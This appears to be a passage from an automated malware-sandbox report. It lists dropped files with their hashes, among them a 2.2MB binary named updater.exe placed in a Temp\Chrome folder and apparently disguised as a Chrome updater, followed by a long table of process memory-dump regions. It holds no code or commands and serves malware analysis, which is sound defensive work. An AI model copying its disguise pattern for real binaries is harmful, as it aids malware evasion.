082ae65398aaaa6b9a9fc8ceff6f6550737bf60ee61cc1bb0fccd1d08ba54b49

SHA512
b4fdaa9e0adc0ed357f11b9e35183e8e906b5c6df9f0a1c5dabd61975facdf4ced62548cdc827cb515903c26b5f46eeee26909ba0e590c904b3d2394837570b2

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9E2.tmp.txt
Filesize
12KB

MD5
370bf58b111b6a8b30975ab09e0bbb8f

SHA1
59a6327d040bdbde89da7dd65bb76c59da60704f

SHA256
2d15af30a8d755a85d7d0edeaa65bdc755468eec1a59048cf4f4966624d79ce0

SHA512
a16dd07cb5f2de7d15161a4f6b0c888a0b470231bd33a8c5452223ce915934376f8e535a3e5cdd67157e7380fe77fba8a2d608d3d1d54dc2b366fed102d67461

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
539B

MD5
f45d46b20b2f149cd2cfba6b1bd00f5f

SHA1
5e98894e4fdba7142eeb7c6634d5eeb110acb594

SHA256
457a1ba49a120abd7d7ff591e0c9cd4e68fbe5fd6bfb0c7a57a909885bf631cd

SHA512
88739f65b1dd634b6e0ec6f7183951d5b67ed2be23fefeef408b69a5b2c73116c4102daa9f19ef5fab1e2dcccec8869cf87f5b0dc525646fce9103743325b68c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
09a88f3f2b526978a733f3764afbb173

SHA1
315190bc3d44fb1e5ea95103bb733338393c1fa5

SHA256
8decc74a9bcd839cb54ae144809ccbab534ebcfe6e308e2de39102dd891c69e2

SHA512
9e7a2f685b8b5259d4f228e9496261bc2cf38d4e2a255d0f35ce6ad8b060a4f31a7681db2c6ca77a6e79479d106b6c885de95820c44b6a8ba57751a788839c08

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
40caa9b00badca24594571e157a6d2a9

SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565

SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
40caa9b00badca24594571e157a6d2a9

SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565

SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Download Submit
memory/60-196-0x0000000000000000-mapping.dmp

Download
memory/356-255-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/356-309-0x0000021E379D0000-0x0000021E379FA000-memory.dmp

Filesize
168KB

Download
memory/412-226-0x0000000000000000-mapping.dmp

Download
memory/504-314-0x0000017AD0DB0000-0x0000017AD0DDA000-memory.dmp

Filesize
168KB

Download
memory/504-256-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/576-299-0x000002024CEA0000-0x000002024CECA000-memory.dmp

Filesize
168KB

Download
memory/576-252-0x000002024CE70000-0x000002024CE93000-memory.dmp

Filesize
140KB

Download
memory/576-247-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/596-258-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/596-320-0x000001C87E0D0000-0x000001C87E0FA000-memory.dmp

Filesize
168KB

Download
memory/648-302-0x00000254110D0000-0x00000254110FA000-memory.dmp

Filesize
168KB

Download
memory/648-248-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/660-224-0x0000000000000000-mapping.dmp

Download
memory/708-223-0x0000000000000000-mapping.dmp

Download
memory/720-257-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/720-319-0x0000023D3E3A0000-0x0000023D3E3CA000-memory.dmp

Filesize
168KB

Download
memory/748-284-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/804-222-0x0000000000000000-mapping.dmp

Download
memory/804-527-0x0000000000000000-mapping.dmp

Download
memory/824-221-0x0000000000000000-mapping.dmp

Download
memory/908-308-0x0000029658550000-0x000002965857A000-memory.dmp

Filesize
168KB

Download
memory/908-254-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/996-250-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/996-305-0x0000025368950000-0x000002536897A000-memory.dmp

Filesize
168KB

Download
memory/1028-281-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1028-358-0x00000000015B0000-0x00000000015DA000-memory.dmp

Filesize
168KB

Download
memory/1140-259-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1140-321-0x000002B8CC5D0000-0x000002B8CC5FA000-memory.dmp

Filesize
168KB

Download
memory/1148-260-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1148-322-0x000001F5B30D0000-0x000001F5B30FA000-memory.dmp

Filesize
168KB

Download
memory/1160-261-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1160-323-0x000001FFBB2B0000-0x000001FFBB2DA000-memory.dmp

Filesize
168KB

Download
memory/1180-262-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1180-324-0x0000023760390000-0x00000237603BA000-memory.dmp

Filesize
168KB

Download
memory/1232-307-0x000002A63A180000-0x000002A63A1AA000-memory.dmp

Filesize
168KB

Download
memory/1232-246-0x0000000000000000-mapping.dmp

Download
memory/1232-477-0x0000000000000000-mapping.dmp

Download
memory/1232-306-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1280-263-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1280-325-0x0000022A20340000-0x0000022A2036A000-memory.dmp

Filesize
168KB

Download
memory/1328-531-0x0000000000000000-mapping.dmp

Download
memory/1376-264-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1376-330-0x000001F8954D0000-0x000001F8954FA000-memory.dmp

Filesize
168KB

Download
memory/1392-198-0x0000000000000000-mapping.dmp

Download
memory/1412-331-0x00000261A90D0000-0x00000261A90FA000-memory.dmp

Filesize
168KB

Download
memory/1412-265-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1428-335-0x0000027F1D6A0000-0x0000027F1D6CA000-memory.dmp

Filesize
168KB

Download
memory/1428-266-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1460-267-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1460-337-0x0000019863F90000-0x0000019863FBA000-memory.dmp

Filesize
168KB

Download
memory/1468-338-0x0000020114440000-0x000002011446A000-memory.dmp

Filesize
168KB

Download
memory/1468-268-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1500-197-0x0000000000000000-mapping.dmp

Download
memory/1552-177-0x0000000000000000-mapping.dmp

Download
memory/1576-269-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1576-342-0x0000025B0AB60000-0x0000025B0AB8A000-memory.dmp

Filesize
168KB

Download
memory/1608-270-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1608-344-0x00000284B8E50000-0x00000284B8E7A000-memory.dmp

Filesize
168KB

Download
memory/1644-345-0x000001FC57A70000-0x000001FC57A9A000-memory.dmp

Filesize
168KB

Download
memory/1644-271-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1664-351-0x0000000000000000-mapping.dmp

Download
memory/1664-357-0x000001E74ED90000-0x000001E74EDBA000-memory.dmp

Filesize
168KB

Download
memory/1668-316-0x000001E7AFCD0000-0x000001E7AFCFA000-memory.dmp

Filesize
168KB

Download
memory/1668-311-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1668-312-0x0000000000000000-mapping.dmp

Download
memory/1668-313-0x000001E7AFC20000-0x000001E7AFC4A000-memory.dmp

Filesize
168KB

Download
memory/1784-220-0x0000000000000000-mapping.dmp

Download
memory/1808-346-0x0000027184AB0000-0x0000027184ADA000-memory.dmp

Filesize
168KB

Download
memory/1808-272-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1824-427-0x0000000000000000-mapping.dmp

Download
memory/1832-273-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1832-347-0x00000206F0AD0000-0x00000206F0AFA000-memory.dmp

Filesize
168KB

Download
memory/1840-274-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1840-348-0x000001DE2B430000-0x000001DE2B45A000-memory.dmp

Filesize
168KB

Download
memory/1884-283-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1940-282-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/1968-303-0x0000000007030000-0x000000000707B000-memory.dmp

Filesize
300KB

Download
memory/1968-251-0x0000000005980000-0x000000000599C000-memory.dmp

Filesize
112KB

Download
memory/1968-235-0x00000000066F0000-0x0000000006756000-memory.dmp

Filesize
408KB

Download
memory/1968-232-0x0000000006680000-0x00000000066E6000-memory.dmp

Filesize
408KB

Download
memory/1968-239-0x00000000067B0000-0x0000000006B00000-memory.dmp

Filesize
3.3MB

Download
memory/1968-230-0x0000000005CB0000-0x0000000005CD2000-memory.dmp

Filesize
136KB

Download
memory/1968-217-0x0000000005D40000-0x0000000006368000-memory.dmp

Filesize
6.2MB

Download
memory/1968-214-0x0000000003340000-0x0000000003376000-memory.dmp

Filesize
216KB

Download
memory/1968-317-0x0000000006E30000-0x0000000006EA6000-memory.dmp

Filesize
472KB

Download
memory/2052-280-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2052-355-0x00000174D3FC0000-0x00000174D3FEA000-memory.dmp

Filesize
168KB

Download
memory/2088-183-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2088-192-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2088-182-0x0000000140002348-mapping.dmp

Download
memory/2088-185-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2088-181-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2120-361-0x0000000000000000-mapping.dmp

Download
memory/2124-487-0x0000000000000000-mapping.dmp

Download
memory/2136-354-0x0000023A2DA70000-0x0000023A2DA9A000-memory.dmp

Filesize
168KB

Download
memory/2136-279-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2312-169-0x0000000000000000-mapping.dmp

Download
memory/2348-277-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2348-352-0x0000024A8D400000-0x0000024A8D42A000-memory.dmp

Filesize
168KB

Download
memory/2356-353-0x000002610BE80000-0x000002610BEAA000-memory.dmp

Filesize
168KB

Download
memory/2356-278-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2408-276-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2408-350-0x000001B00D360000-0x000001B00D38A000-memory.dmp

Filesize
168KB

Download
memory/2460-275-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2460-349-0x0000021564AD0000-0x0000021564AFA000-memory.dmp

Filesize
168KB

Download
memory/2468-285-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2532-286-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2552-287-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2620-294-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2644-293-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2652-292-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2692-120-0x000001E230DC0000-0x000001E230FFC000-memory.dmp

Filesize
2.2MB

Download
memory/2692-176-0x000001E218320000-0x000001E218332000-memory.dmp

Filesize
72KB

Download
memory/2692-180-0x000001E218340000-0x000001E218346000-memory.dmp

Filesize
24KB

Download
memory/2692-122-0x000001E216200000-0x000001E21643B000-memory.dmp

Filesize
2.2MB

Download
memory/2692-123-0x000001E230B80000-0x000001E230DA4000-memory.dmp

Filesize
2.1MB

Download
memory/2696-295-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2792-483-0x0000000000000000-mapping.dmp

Download
memory/2836-291-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/2948-191-0x0000000000000000-mapping.dmp

Download
memory/3016-249-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/3016-304-0x0000000000C70000-0x0000000000C9A000-memory.dmp

Filesize
168KB

Download
memory/3132-296-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/3168-520-0x0000000000000000-mapping.dmp

Download
memory/3232-199-0x0000000000000000-mapping.dmp

Download
memory/3268-310-0x0000000000000000-mapping.dmp

Download
memory/3268-315-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/3268-318-0x00000251343A0000-0x00000251343CA000-memory.dmp

Filesize
168KB

Download
memory/3312-482-0x0000000000000000-mapping.dmp

Download
memory/3380-189-0x0000000000000000-mapping.dmp

Download
memory/3444-188-0x0000000000000000-mapping.dmp

Download
memory/3472-290-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/3488-513-0x0000000000000000-mapping.dmp

Download
memory/3536-187-0x0000000000000000-mapping.dmp

Download
memory/3536-485-0x0000000000000000-mapping.dmp

Download
memory/3548-186-0x0000000000000000-mapping.dmp

Download
memory/3624-229-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmp

Filesize
696KB

Download
memory/3624-225-0x00000207C13F0000-0x00000207C142C000-memory.dmp

Filesize
240KB

Download
memory/3624-242-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmp

Filesize
696KB

Download
memory/3624-240-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmp

Filesize
1.9MB

Download
memory/3624-227-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmp

Filesize
1.9MB

Download
memory/3700-245-0x0000000000000000-mapping.dmp

Download
memory/3768-130-0x0000000000000000-mapping.dmp

Download
memory/3768-473-0x0000000000000000-mapping.dmp

Download
memory/3768-135-0x000001B5F6D80000-0x000001B5F6DA2000-memory.dmp

Filesize
136KB

Download
memory/3768-138-0x000001B5F6F30000-0x000001B5F6FA6000-memory.dmp

Filesize
472KB

Download
memory/3776-498-0x0000000000000000-mapping.dmp

Download
memory/3956-194-0x0000000000000000-mapping.dmp

Download
memory/3996-336-0x000001851FCA0000-0x000001851FCCA000-memory.dmp

Filesize
168KB

Download
memory/3996-333-0x000001851E260000-0x000001851E28A000-memory.dmp

Filesize
168KB

Download
memory/3996-334-0x0000000000000000-mapping.dmp

Download
memory/4004-301-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4016-507-0x0000000000000000-mapping.dmp

Download
memory/4024-129-0x0000000000000000-mapping.dmp

Download
memory/4056-289-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4064-379-0x0000000000000000-mapping.dmp

Download
memory/4068-504-0x0000000000401BEA-mapping.dmp

Download
memory/4076-505-0x0000000000000000-mapping.dmp

Download
memory/4164-175-0x0000000000000000-mapping.dmp

Download
memory/4224-300-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4224-166-0x0000000000000000-mapping.dmp

Download
memory/4252-297-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4256-195-0x0000000000000000-mapping.dmp

Download
memory/4308-328-0x000001CFD01E0000-0x000001CFD020A000-memory.dmp

Filesize
168KB

Download
memory/4308-329-0x000001CFD0390000-0x000001CFD03BA000-memory.dmp

Filesize
168KB

Download
memory/4308-327-0x0000000000000000-mapping.dmp

Download
memory/4312-167-0x0000000000000000-mapping.dmp

Download
memory/4336-496-0x0000000000000000-mapping.dmp

Download
memory/4356-203-0x0000000000000000-mapping.dmp

Download
memory/4404-184-0x0000000000000000-mapping.dmp

Download
memory/4468-298-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4500-201-0x0000000000000000-mapping.dmp

Download
memory/4508-200-0x0000000000000000-mapping.dmp

Download
memory/4520-202-0x0000000000000000-mapping.dmp

Download
memory/4608-431-0x0000000000000000-mapping.dmp

Download
memory/4716-193-0x0000000000000000-mapping.dmp

Download
memory/4796-179-0x0000000000000000-mapping.dmp

Download
memory/4808-178-0x0000000000000000-mapping.dmp

Download
memory/4816-479-0x0000000000000000-mapping.dmp

Download
memory/4876-233-0x00000001400024C8-mapping.dmp

Download
memory/4876-231-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4876-236-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4876-234-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4876-237-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmp

Filesize
1.9MB

Download
memory/4876-238-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmp

Filesize
696KB

Download
memory/4876-243-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4876-244-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmp

Filesize
1.9MB

Download
memory/4892-288-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmp

Filesize
64KB

Download
memory/4952-393-0x0000000000000000-mapping.dmp

Download
memory/4980-228-0x0000000000000000-mapping.dmp

Download
memory/5012-190-0x0000000000000000-mapping.dmp

Download